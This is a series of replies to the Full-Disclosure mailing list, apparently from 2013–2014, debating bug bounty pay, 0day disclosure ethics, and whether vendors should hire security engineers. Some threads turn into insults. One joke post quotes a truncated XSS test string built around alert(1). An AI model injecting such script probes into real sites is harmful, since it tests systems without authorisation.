Re: [Full-disclosure] Hacking in Schools

2014-02-25 Thread Benji 
Horse riding around schools won't be allowed, if they wouldn't let me bring
a paintball gun in, they won't allow this.
On 25 Feb 2014 18:19, "Pete Herzog"  wrote:

> How to teach hacking in school and open up education:
>
> https://opensource.com/education/14/2/teach-hacking-schools-open-education
>
> Sincerely,
> -pete.
>
> --
> Pete Herzog - Managing Director - p...@isecom.org
> ISECOM - Institute for Security and Open Methodologies
>
> Need impartial, expert advice? Request a call:
> http://clarity.fm/peteherzog
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Ektron CMS TakeOver Part (2) - PaylPal-Forward.com demonstration

2014-02-05 Thread Benji 
s/with their Facebook or Twitter credentials//g


On Tue, Feb 4, 2014 at 10:51 PM, security curmudgeon
wrote:

>
> : From: Mark Litchfield 
>
> : As previously stated, I would post an update for Ektron CMS bypassing :
> the security fix.
>
>
> : A full step by step with the usual screen shots can be found at - :
> http://www.securatary.com/vulnerabilities
>
> Uh... you expect people to login to your site with their Facebook or
> Twitter credentials, to access these advisories?
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Serious Yahoo bug discovered. Researchers rewarded with $12.50

2013-10-03 Thread Benji 
Semi related, I'd like to know at what $ amount you guys value your ability
to type variations of ' ">alert(1) ' . I value mine at
around $1000 a time because the characters are made of gold dust and I
spent most of my life learning to type.

:)


On Thu, Oct 3, 2013 at 9:09 AM, Benji  wrote:

> Yahoo have now started a big bounty formally instead of just trying to be
> nice (
> http://yahoodevelopers.tumblr.com/post/62953984019/so-im-the-guy-who-sent-the-t-shirt-out-as-a-thank-you).
>
> You can all go back to worrying about your bank balances now, and fitting
> the stereotype that all you (infosec) care about is money and not helping
> the world.
> On 3 Oct 2013 08:41, "Benji"  wrote:
>
>> No-one is making you do anything.
>>
>> If you don't feel like helping for free, like in the old days (2 years
>> ago..) then don't
>>
>> Jeeze, I remember when you guys used to moan that a company had no
>> security policy, now it's that "the amount offered is too low for me from a
>> company that has no formal bounty and was probably just ttrying to be nice
>> to gst out of bed for".
>>
>> Nice to meet you Justin Bieber of the infosec community.
>> On 3 Oct 2013 08:35, "adam"  wrote:
>>
>>> bradon nailed it, it has nothing to do with entitlement, it has to do
>>> with incentive. $12.50 is not only _not_ incentive, but it's outright
>>> insulting, thus having the exact opposite effect.
>>>
>>>
>>> On Wed, Oct 2, 2013 at 10:34 AM, Jordon Bedwell wrote:
>>>
>>>> On Wed, Oct 2, 2013 at 10:32 AM, Ian Hayes 
>>>> wrote:
>>>> > Sounds like someone has an overdeveloped sense of self-entitlement.
>>>>
>>>> Sounds like somebody is failing at trolling.
>>>>
>>>> ___
>>>> Full-Disclosure - We believe in it.
>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>
>>>
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Serious Yahoo bug discovered. Researchers rewarded with $12.50

2013-10-03 Thread Benji 
Yahoo have now started a big bounty formally instead of just trying to be
nice (
http://yahoodevelopers.tumblr.com/post/62953984019/so-im-the-guy-who-sent-the-t-shirt-out-as-a-thank-you).

You can all go back to worrying about your bank balances now, and fitting
the stereotype that all you (infosec) care about is money and not helping
the world.
On 3 Oct 2013 08:41, "Benji"  wrote:

> No-one is making you do anything.
>
> If you don't feel like helping for free, like in the old days (2 years
> ago..) then don't
>
> Jeeze, I remember when you guys used to moan that a company had no
> security policy, now it's that "the amount offered is too low for me from a
> company that has no formal bounty and was probably just ttrying to be nice
> to gst out of bed for".
>
> Nice to meet you Justin Bieber of the infosec community.
> On 3 Oct 2013 08:35, "adam"  wrote:
>
>> bradon nailed it, it has nothing to do with entitlement, it has to do
>> with incentive. $12.50 is not only _not_ incentive, but it's outright
>> insulting, thus having the exact opposite effect.
>>
>>
>> On Wed, Oct 2, 2013 at 10:34 AM, Jordon Bedwell wrote:
>>
>>> On Wed, Oct 2, 2013 at 10:32 AM, Ian Hayes 
>>> wrote:
>>> > Sounds like someone has an overdeveloped sense of self-entitlement.
>>>
>>> Sounds like somebody is failing at trolling.
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Serious Yahoo bug discovered. Researchers rewarded with $12.50

2013-10-03 Thread Benji 
No-one is making you do anything.

If you don't feel like helping for free, like in the old days (2 years
ago..) then don't

Jeeze, I remember when you guys used to moan that a company had no security
policy, now it's that "the amount offered is too low for me from a company
that has no formal bounty and was probably just ttrying to be nice to gst
out of bed for".

Nice to meet you Justin Bieber of the infosec community.
On 3 Oct 2013 08:35, "adam"  wrote:

> bradon nailed it, it has nothing to do with entitlement, it has to do with
> incentive. $12.50 is not only _not_ incentive, but it's outright insulting,
> thus having the exact opposite effect.
>
>
> On Wed, Oct 2, 2013 at 10:34 AM, Jordon Bedwell wrote:
>
>> On Wed, Oct 2, 2013 at 10:32 AM, Ian Hayes 
>> wrote:
>> > Sounds like someone has an overdeveloped sense of self-entitlement.
>>
>> Sounds like somebody is failing at trolling.
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] 0day Vulnerability in VLC (this is my first release of the vuln anywhere)

2013-04-23 Thread Benji 
I look forward to see who wins in this argument over personal opinion.


On Tue, Apr 23, 2013 at 4:12 PM, Gregory Boddin  wrote:

> You have to think about end-users as well ... Those are impacted first,
> not the vendors.
>
>
>
>
>
> On 23 April 2013 16:51, Georgi Guninski  wrote:
>
>> Completely disagree.
>>
>> IMHO nobody should bother negotiating with terrorist vendors.
>>
>> Q: What responsibility vendors have?
>> A: Zero. Check their disclaimers.
>>
>>
>> On Tue, Apr 23, 2013 at 04:14:53PM +0200, Gregory Boddin wrote:
>> > That's indeed not rocket science.
>> >
>> > Nobody should release their disclosure/exploit (or give hint about it)
>> in
>> > the wild before letting the vendor fix it.
>> >
>> > There's already enough blackhats out there selling/using those.
>> >
>> > I sure hope I am not the only person in the list who wishes responsible
>> > > disclosure.
>> > >
>> > > ---
>> > > Henri Salo
>> > >
>> > > -BEGIN PGP SIGNATURE-
>> > > Version: GnuPG v1.4.10 (GNU/Linux)
>> > >
>> > > iEYEARECAAYFAlF2eWAACgkQXf6hBi6kbk8p+QCgkrzZnNpipCMC/kexFq8OR3Q2
>> > > NiIAnRMYicxFqmJhvjLIEZolEKjQcEEE
>> > > =q78V
>> > > -END PGP SIGNATURE-
>> > >
>> > > ___
>> > > Full-Disclosure - We believe in it.
>> > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> > > Hosted and sponsored by Secunia - http://secunia.com/
>> > >
>>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] VUPEN Security Research - Adobe Flash Player RTMP Data Processing Object Confusion (CVE-2013-2555)

2013-04-22 Thread Benji 
It was a perfect example of a largely deployed application which utilises 
security engineers, and has pushed patches/code which was ineffective. My point 
was that bugs like that are a lot easier to sort in a design or development 
stage than after the fact when remediation time is tight, and that a 'QA' 
process of any type will not make up for developer mistakes.

Sent from my iPhone.

On 22 Apr 2013, at 07:39, Jeffrey Walton  wrote:

> On Sat, Apr 20, 2013 at 7:37 PM, Benji  wrote:
>> Because security engineers are different to a QA department you originally
>> suggested, and you seem to be very ideologist about the scenarios. As we've
>> seen, Oracle's Java product has security engineers and this has not
>> prevented flaws.
> Oracle is probably not a good example since it leaves known flaws in
> the code base.
> 
> http://www.h-online.com/security/news/item/Java-7-Update-21-closes-security-holes-and-restricts-applets-1843558.html:
> 
> The warnings for Java applets now come in two types: an applet that
> has a valid certificate generates a warning dialog with the Java logo
> in it and details of the applet's certificate, but an applet that is
> signed with an invalid certificate, is unsigned or self-signed, will
> generate a warning with a yellow shield and warning triangle which is
> designed to recommend that the applet should not be run. There is a
> problem though with the certificate checking; as The H reported in
> March, criminals were using revoked certificates as part of their
> attacks and the Java runtime was doing nothing to check the validity
> of certificates. On the latest update of Java, this has not changed
> either; online validation and revocation checks are still off by
> default.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] VUPEN Security Research - Adobe Flash Player RTMP Data Processing Object Confusion (CVE-2013-2555)

2013-04-20 Thread Benji 
Sorry, by flaws, I should have said, *"has not prevent bad code/ineffective
patches from being pushed out"


On Sun, Apr 21, 2013 at 12:41 AM, Benji  wrote:

> (For example,
> http://webcache.googleusercontent.com/search?q=cache:2cXGaaHnqyMJ:www.computerworld.com/s/article/9235954/Researchers_find_critical_vulnerabilities_in_Java_7_Update_11+&cd=8&hl=en&ct=clnk&gl=uk)
>
>
> On Sun, Apr 21, 2013 at 12:37 AM, Benji  wrote:
>
>> Because security engineers are different to a QA department you
>> originally suggested, and you seem to be very ideologist about the
>> scenarios. As we've seen, Oracle's Java product has security engineers and
>> this has not prevented flaws.
>>
>>
>> On Sun, Apr 21, 2013 at 12:34 AM, Bryan  wrote:
>>
>>> "Your 5-chained-0day-to-code-exec, in my opinion, does not count as
>>> negligence  and comes from the developer effectively not being a
>>> security engineer"
>>> Solution: Hire security engineers.
>>>
>>> "In my opinion we are not at the stage in industry where we can
>>> consider/expect any developer to think through each implication of
>>> each feature they implement"
>>> Solution: Hire security engineers to think through each implication.
>>>
>>> Why are we disagreeing?
>>>
>>> On Sun, Apr 21, 2013 at 12:11:51AM +0100, Benji wrote:
>>> >Your proposition was that developers will always make mistakes and
>>> >introduce stupid problems, so a QA team/process is necessary. While
>>> I
>>> >agree that there should be a QA/'audit' at some point, it shouldnt
>>> be the
>>> >stage that is relied on. Applications that are flawed from the
>>> design
>>> >stage onwards will become expenditure blackholes, especially after
>>> going
>>> >through any QA process which should highlight these.
>>> >Potentially yes, but most of the larger companies appear to already
>>> do
>>> >this. A quick search through google shows that Oracle atleast
>>> already
>>> >have, and/or are actively hiring security engineers involved with
>>> Java
>>> >(for example).
>>> >Flaws will always pop up and I think we may now be bordering on
>>> discussing
>>> >what counts as negligence in some cases. Your
>>> 5-chained-0day-to-code-exec,
>>> >in my opinion, does not count as negligence and comes from the
>>> developer
>>> >effectively not being a security engineer, but doing the job of a
>>> >developer. In my opinion we are not at the stage in industry where
>>> we can
>>> >consider/expect any developer to think through each implication of
>>> each
>>> >feature they implement, without a strong security background as
>>> much as we
>>> >may appreciate it. Negligence in my opinion of security
>>> vulnerabilities is
>>> >having obvious format string bugs/buffer overflows when handling
>>> user
>>> >input for example, or incorrect permissions, or just a lack of
>>> >consideration to obvious problems. Developer training should pick
>>> up on
>>> >the obvious bugs, or atleast give developers an understanding of
>>> how to
>>> >handle users/user input in a safe manner, and know the implications
>>> of not
>>> >doing so.
>>> >
>>> >On Sat, Apr 20, 2013 at 11:58 PM, Bryan 
>>> wrote:
>>> >
>>> >  I think the definition of 'needless staff' highly depends on
>>> whether you
>>> >  want 'vulnerable software'.
>>> >
>>> >  Educating current developers is absolutely a good idea, but still
>>> not
>>> >  foolproof. The bottom line is that if you want safe software, you
>>> need
>>> >  to invest in proper development. As far as I am concerned, for
>>> large
>>> >  companies like Adobe and Oracle, where software bugs in your
>>> product
>>> >  have a direct impact on the safety of your customers, that
>>> involves
>>> >  hiring specialized staff.
>>>
>>
>>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] VUPEN Security Research - Adobe Flash Player RTMP Data Processing Object Confusion (CVE-2013-2555)

2013-04-20 Thread Benji 
(For example,
http://webcache.googleusercontent.com/search?q=cache:2cXGaaHnqyMJ:www.computerworld.com/s/article/9235954/Researchers_find_critical_vulnerabilities_in_Java_7_Update_11+&cd=8&hl=en&ct=clnk&gl=uk)


On Sun, Apr 21, 2013 at 12:37 AM, Benji  wrote:

> Because security engineers are different to a QA department you originally
> suggested, and you seem to be very ideologist about the scenarios. As we've
> seen, Oracle's Java product has security engineers and this has not
> prevented flaws.
>
>
> On Sun, Apr 21, 2013 at 12:34 AM, Bryan  wrote:
>
>> "Your 5-chained-0day-to-code-exec, in my opinion, does not count as
>> negligence  and comes from the developer effectively not being a
>> security engineer"
>> Solution: Hire security engineers.
>>
>> "In my opinion we are not at the stage in industry where we can
>> consider/expect any developer to think through each implication of
>> each feature they implement"
>> Solution: Hire security engineers to think through each implication.
>>
>> Why are we disagreeing?
>>
>> On Sun, Apr 21, 2013 at 12:11:51AM +0100, Benji wrote:
>> >Your proposition was that developers will always make mistakes and
>> >introduce stupid problems, so a QA team/process is necessary. While I
>> >agree that there should be a QA/'audit' at some point, it shouldnt
>> be the
>> >stage that is relied on. Applications that are flawed from the design
>> >stage onwards will become expenditure blackholes, especially after
>> going
>> >through any QA process which should highlight these.
>> >Potentially yes, but most of the larger companies appear to already
>> do
>> >this. A quick search through google shows that Oracle atleast already
>> >have, and/or are actively hiring security engineers involved with
>> Java
>> >(for example).
>> >Flaws will always pop up and I think we may now be bordering on
>> discussing
>> >what counts as negligence in some cases. Your
>> 5-chained-0day-to-code-exec,
>> >in my opinion, does not count as negligence and comes from the
>> developer
>> >effectively not being a security engineer, but doing the job of a
>> >developer. In my opinion we are not at the stage in industry where
>> we can
>> >consider/expect any developer to think through each implication of
>> each
>> >feature they implement, without a strong security background as much
>> as we
>> >may appreciate it. Negligence in my opinion of security
>> vulnerabilities is
>> >having obvious format string bugs/buffer overflows when handling user
>> >input for example, or incorrect permissions, or just a lack of
>> >consideration to obvious problems. Developer training should pick up
>> on
>> >the obvious bugs, or atleast give developers an understanding of how
>> to
>> >handle users/user input in a safe manner, and know the implications
>> of not
>> >doing so.
>> >
>> >On Sat, Apr 20, 2013 at 11:58 PM, Bryan 
>> wrote:
>> >
>> >  I think the definition of 'needless staff' highly depends on
>> whether you
>> >  want 'vulnerable software'.
>> >
>> >  Educating current developers is absolutely a good idea, but still
>> not
>> >  foolproof. The bottom line is that if you want safe software, you
>> need
>> >  to invest in proper development. As far as I am concerned, for
>> large
>> >  companies like Adobe and Oracle, where software bugs in your
>> product
>> >  have a direct impact on the safety of your customers, that involves
>> >  hiring specialized staff.
>>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] VUPEN Security Research - Adobe Flash Player RTMP Data Processing Object Confusion (CVE-2013-2555)

2013-04-20 Thread Benji 
Because security engineers are different to a QA department you originally
suggested, and you seem to be very ideologist about the scenarios. As we've
seen, Oracle's Java product has security engineers and this has not
prevented flaws.


On Sun, Apr 21, 2013 at 12:34 AM, Bryan  wrote:

> "Your 5-chained-0day-to-code-exec, in my opinion, does not count as
> negligence  and comes from the developer effectively not being a
> security engineer"
> Solution: Hire security engineers.
>
> "In my opinion we are not at the stage in industry where we can
> consider/expect any developer to think through each implication of
> each feature they implement"
> Solution: Hire security engineers to think through each implication.
>
> Why are we disagreeing?
>
> On Sun, Apr 21, 2013 at 12:11:51AM +0100, Benji wrote:
> >Your proposition was that developers will always make mistakes and
> >introduce stupid problems, so a QA team/process is necessary. While I
> >agree that there should be a QA/'audit' at some point, it shouldnt be
> the
> >stage that is relied on. Applications that are flawed from the design
> >stage onwards will become expenditure blackholes, especially after
> going
> >through any QA process which should highlight these.
> >Potentially yes, but most of the larger companies appear to already do
> >this. A quick search through google shows that Oracle atleast already
> >have, and/or are actively hiring security engineers involved with Java
> >(for example).
> >Flaws will always pop up and I think we may now be bordering on
> discussing
> >what counts as negligence in some cases. Your
> 5-chained-0day-to-code-exec,
> >in my opinion, does not count as negligence and comes from the
> developer
> >effectively not being a security engineer, but doing the job of a
> >developer. In my opinion we are not at the stage in industry where we
> can
> >consider/expect any developer to think through each implication of
> each
> >feature they implement, without a strong security background as much
> as we
> >may appreciate it. Negligence in my opinion of security
> vulnerabilities is
> >having obvious format string bugs/buffer overflows when handling user
> >input for example, or incorrect permissions, or just a lack of
> >consideration to obvious problems. Developer training should pick up
> on
> >the obvious bugs, or atleast give developers an understanding of how
> to
> >handle users/user input in a safe manner, and know the implications
> of not
> >doing so.
> >
> >On Sat, Apr 20, 2013 at 11:58 PM, Bryan 
> wrote:
> >
> >  I think the definition of 'needless staff' highly depends on
> whether you
> >  want 'vulnerable software'.
> >
> >  Educating current developers is absolutely a good idea, but still
> not
> >  foolproof. The bottom line is that if you want safe software, you
> need
> >  to invest in proper development. As far as I am concerned, for large
> >  companies like Adobe and Oracle, where software bugs in your product
> >  have a direct impact on the safety of your customers, that involves
> >  hiring specialized staff.
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] VUPEN Security Research - Adobe Flash Player RTMP Data Processing Object Confusion (CVE-2013-2555)

2013-04-20 Thread Benji 
Your proposition was that developers will always make mistakes and
introduce stupid problems, so a QA team/process is necessary. While I agree
that there should be a QA/'audit' at some point, it shouldnt be the stage
that is relied on. Applications that are flawed from the design stage
onwards will become expenditure blackholes, especially after going through
any QA process which should highlight these.

Potentially yes, but most of the larger companies appear to already do
this. A quick search through google shows that Oracle atleast already have,
and/or are actively hiring security engineers involved with Java (for
example).

Flaws will always pop up and I think we may now be bordering on discussing
what counts as negligence in some cases. Your 5-chained-0day-to-code-exec,
in my opinion, does not count as negligence and comes from the developer
effectively not being a security engineer, but doing the job of a
developer. In my opinion we are not at the stage in industry where we can
consider/expect any developer to think through each implication of each
feature they implement, without a strong security background as much as we
may appreciate it. Negligence in my opinion of security vulnerabilities is
having obvious format string bugs/buffer overflows when handling user input
for example, or incorrect permissions, or just a lack of consideration to
obvious problems. Developer training should pick up on the obvious bugs, or
atleast give developers an understanding of how to handle users/user input
in a safe manner, and know the implications of not doing so.




On Sat, Apr 20, 2013 at 11:58 PM, Bryan  wrote:

> I think the definition of 'needless staff' highly depends on whether you
> want 'vulnerable software'.
>
> Educating current developers is absolutely a good idea, but still not
> foolproof. The bottom line is that if you want safe software, you need
> to invest in proper development. As far as I am concerned, for large
> companies like Adobe and Oracle, where software bugs in your product
> have a direct impact on the safety of your customers, that involves
> hiring specialized staff.
>
> On Sat, Apr 20, 2013 at 11:49:22PM +0100, Benji wrote:
> >    (in my opinion)
> >
> >On Sat, Apr 20, 2013 at 11:42 PM, Benji  wrote:
> >
> >  Yes, a better idea would be to educate and inform developers. At a
> >  business level atleast this will a) save extra expenditure on
> needless
> >  staff  and extra departments b) result in faster turn arounds as
> there's
> >  then less time needed for remediation. At a technical level, it will
> >  atleast result in less 'dumb' bugs (assuming training and education
> is
> >  effective and relevant).
> >  I think at this point expecting software to have 0 flaws or being
> under
> >  the illusion that software will ever be flawless in it's current
> state
> >  is like wishing really hard before bed every night that genetics and
> >  evolution will make you a unicorn.
> >
> >  On Sat, Apr 20, 2013 at 11:35 PM, Bryan 
> wrote:
> >
> >I am just saying that developers and designers make mistakes and
> >that there is no getting around that. Rather than relying on the
> >benevolent 0day researchers from the sky publicly disclosing their
> >vulnerabilities, more responsible QA testing within the company
> will
> >prevent many of these vulnerabilities from occurring in the first
> >place. Or do you have a better idea?
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] VUPEN Security Research - Adobe Flash Player RTMP Data Processing Object Confusion (CVE-2013-2555)

2013-04-20 Thread Benji 
(in my opinion)


On Sat, Apr 20, 2013 at 11:42 PM, Benji  wrote:

> Yes, a better idea would be to educate and inform developers. At a
> business level atleast this will a) save extra expenditure on needless
> staff  and extra departments b) result in faster turn arounds as there's
> then less time needed for remediation. At a technical level, it will
> atleast result in less 'dumb' bugs (assuming training and education is
> effective and relevant).
>
> I think at this point expecting software to have 0 flaws or being under
> the illusion that software will ever be flawless in it's current state is
> like wishing really hard before bed every night that genetics and evolution
> will make you a unicorn.
>
>
> On Sat, Apr 20, 2013 at 11:35 PM, Bryan  wrote:
>
>> I am just saying that developers and designers make mistakes and
>> that there is no getting around that. Rather than relying on the
>> benevolent 0day researchers from the sky publicly disclosing their
>> vulnerabilities, more responsible QA testing within the company will
>> prevent many of these vulnerabilities from occurring in the first
>> place. Or do you have a better idea?
>>
>> On Sat, Apr 20, 2013 at 11:06:33PM +0100, Benji wrote:
>> >Let me expand on that, otherwise I'm sure it's unclear.
>> >Is your suggestion, to remove the worry of developers making
>> mistakes, to
>> >add another human process after it and rely on this to remove all
>> >mistakes?
>> >
>> >On Sat, Apr 20, 2013 at 10:54 PM, Benji  wrote:
>> >
>> >  Yes, after the people that can make mistakes, we should have
>> people that
>> >  are incapable of making mistakes. I totally agree, what a good
>> idea.
>> >
>> >  On Sat, Apr 20, 2013 at 10:28 PM, Bryan 
>> wrote:
>> >
>> >The code monkeys can make mistakes as long as there is a process
>> to
>> >detect and remedy their mistakes before things get shipped.
>> Hiring
>> >decent application security researchers to audit their code
>> would be a
>> >good start.
>> >On Sat, Apr 20, 2013 at 09:51:40AM -0400, Lee wrote:
>> >> On 4/20/13, Sergio Alvarez  wrote:
>> >> > Why instead of discussing about ethics about 0days, don't you
>> >discuss about
>> >> > responsible DEVELOPMENT instead?
>> >> > If products where properly designed and developed there
>> wouldn't
>> >be 0days
>> >> > for them, would them?
>> >>
>> >> Only if the designers & developers were perfect and never made
>> >mistakes.
>> >
>> >___
>> >Full-Disclosure - We believe in it.
>> >Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> >Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] VUPEN Security Research - Adobe Flash Player RTMP Data Processing Object Confusion (CVE-2013-2555)

2013-04-20 Thread Benji 
Yes, a better idea would be to educate and inform developers. At a business
level atleast this will a) save extra expenditure on needless staff  and
extra departments b) result in faster turn arounds as there's then less
time needed for remediation. At a technical level, it will atleast result
in less 'dumb' bugs (assuming training and education is effective and
relevant).

I think at this point expecting software to have 0 flaws or being under the
illusion that software will ever be flawless in it's current state is like
wishing really hard before bed every night that genetics and evolution will
make you a unicorn.


On Sat, Apr 20, 2013 at 11:35 PM, Bryan  wrote:

> I am just saying that developers and designers make mistakes and
> that there is no getting around that. Rather than relying on the
> benevolent 0day researchers from the sky publicly disclosing their
> vulnerabilities, more responsible QA testing within the company will
> prevent many of these vulnerabilities from occurring in the first
> place. Or do you have a better idea?
>
> On Sat, Apr 20, 2013 at 11:06:33PM +0100, Benji wrote:
> >Let me expand on that, otherwise I'm sure it's unclear.
> >Is your suggestion, to remove the worry of developers making
> mistakes, to
> >add another human process after it and rely on this to remove all
> >mistakes?
> >
> >On Sat, Apr 20, 2013 at 10:54 PM, Benji  wrote:
> >
> >  Yes, after the people that can make mistakes, we should have people
> that
> >  are incapable of making mistakes. I totally agree, what a good idea.
> >
> >  On Sat, Apr 20, 2013 at 10:28 PM, Bryan 
> wrote:
> >
> >The code monkeys can make mistakes as long as there is a process
> to
> >detect and remedy their mistakes before things get shipped. Hiring
> >decent application security researchers to audit their code would
> be a
> >good start.
> >On Sat, Apr 20, 2013 at 09:51:40AM -0400, Lee wrote:
> >> On 4/20/13, Sergio Alvarez  wrote:
> >> > Why instead of discussing about ethics about 0days, don't you
> >discuss about
> >> > responsible DEVELOPMENT instead?
> >> > If products where properly designed and developed there
> wouldn't
> >be 0days
> >> > for them, would them?
> >>
> >> Only if the designers & developers were perfect and never made
> >mistakes.
> >
> >___
> >Full-Disclosure - We believe in it.
> >Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] VUPEN Security Research - Adobe Flash Player RTMP Data Processing Object Confusion (CVE-2013-2555)

2013-04-20 Thread Benji 
Let me expand on that, otherwise I'm sure it's unclear.

Is your suggestion, to remove the worry of developers making mistakes, to
add another human process after it and rely on this to remove all mistakes?


On Sat, Apr 20, 2013 at 10:54 PM, Benji  wrote:

> Yes, after the people that can make mistakes, we should have people that
> are incapable of making mistakes. I totally agree, what a good idea.
>
>
> On Sat, Apr 20, 2013 at 10:28 PM, Bryan  wrote:
>
>> The code monkeys can make mistakes as long as there is a process to
>> detect and remedy their mistakes before things get shipped. Hiring
>> decent application security researchers to audit their code would be a
>> good start.
>>
>> On Sat, Apr 20, 2013 at 09:51:40AM -0400, Lee wrote:
>> > On 4/20/13, Sergio Alvarez  wrote:
>> > > Why instead of discussing about ethics about 0days, don't you discuss
>> about
>> > > responsible DEVELOPMENT instead?
>> > > If products where properly designed and developed there wouldn't be
>> 0days
>> > > for them, would them?
>> >
>> > Only if the designers & developers were perfect and never made mistakes.
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] VUPEN Security Research - Adobe Flash Player RTMP Data Processing Object Confusion (CVE-2013-2555)

2013-04-20 Thread Benji 
Yes, after the people that can make mistakes, we should have people that
are incapable of making mistakes. I totally agree, what a good idea.


On Sat, Apr 20, 2013 at 10:28 PM, Bryan  wrote:

> The code monkeys can make mistakes as long as there is a process to
> detect and remedy their mistakes before things get shipped. Hiring
> decent application security researchers to audit their code would be a
> good start.
>
> On Sat, Apr 20, 2013 at 09:51:40AM -0400, Lee wrote:
> > On 4/20/13, Sergio Alvarez  wrote:
> > > Why instead of discussing about ethics about 0days, don't you discuss
> about
> > > responsible DEVELOPMENT instead?
> > > If products where properly designed and developed there wouldn't be
> 0days
> > > for them, would them?
> >
> > Only if the designers & developers were perfect and never made mistakes.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fw: Fw: Fw: Justice for Molly (copskillingcivillians)

2013-03-29 Thread Benji 
STOP STRESSING YOUR HEART JERRY, OR THAT OPERATION YOU HAD ON IT WONT SAVE
YOU


On Fri, Mar 29, 2013 at 4:00 PM, Gage Bystrom wrote:

> Personal habit when it comes to posting on lists that has nothing to do
> with integrity.
> On Mar 29, 2013 8:55 AM, "Jerry dePriest"  wrote:
>
>> **
>> for 1 he posted it to the list instead of emailing me direct, Mr nosey
>> pants. I see nothing has changed on this list except the level of
>> integrity...
>>
>> - Original Message -
>> *From:* Gage Bystrom 
>> *To:* full-disclosure@lists.grok.org.uk
>> *Sent:* Friday, March 29, 2013 10:51 AM
>> *Subject:* Re: [Full-disclosure] Fw: Fw: Fw: Justice for Molly
>> (copskillingcivillians)
>>
>> If you don't tell people what to post or not postwhy are you telling
>> them to not post how they disagree with you on if this story should be
>> posted to FD?
>>
>> Hum dee dum dum
>> On Mar 29, 2013 5:28 AM, "Jerry dePriest"  wrote:
>>
>>> **
>>> 90% of the posts on here are illegal in some form or fashion. It's not a
>>> personal attack, it's full disclosure on how one can track info using
>>> http://archive.org/index.php no one looked at that aspect.
>>>
>>> To Johnny law dog: The software maker can over ride what you listed with
>>> their own disclaimer so thats bullshit. Ask Kevin Mitnik...
>>>
>>> Don't tell me what to post, I don't tell you what to post or what not to
>>> post...
>>>
>>> thanks for keeping this thread alive. You could have just stfu, but
>>> no
>>>
>>> I said sorry and dropped it, you're the ones keeping it going, THANKS!
>>> 'ssoles
>>>
>>>
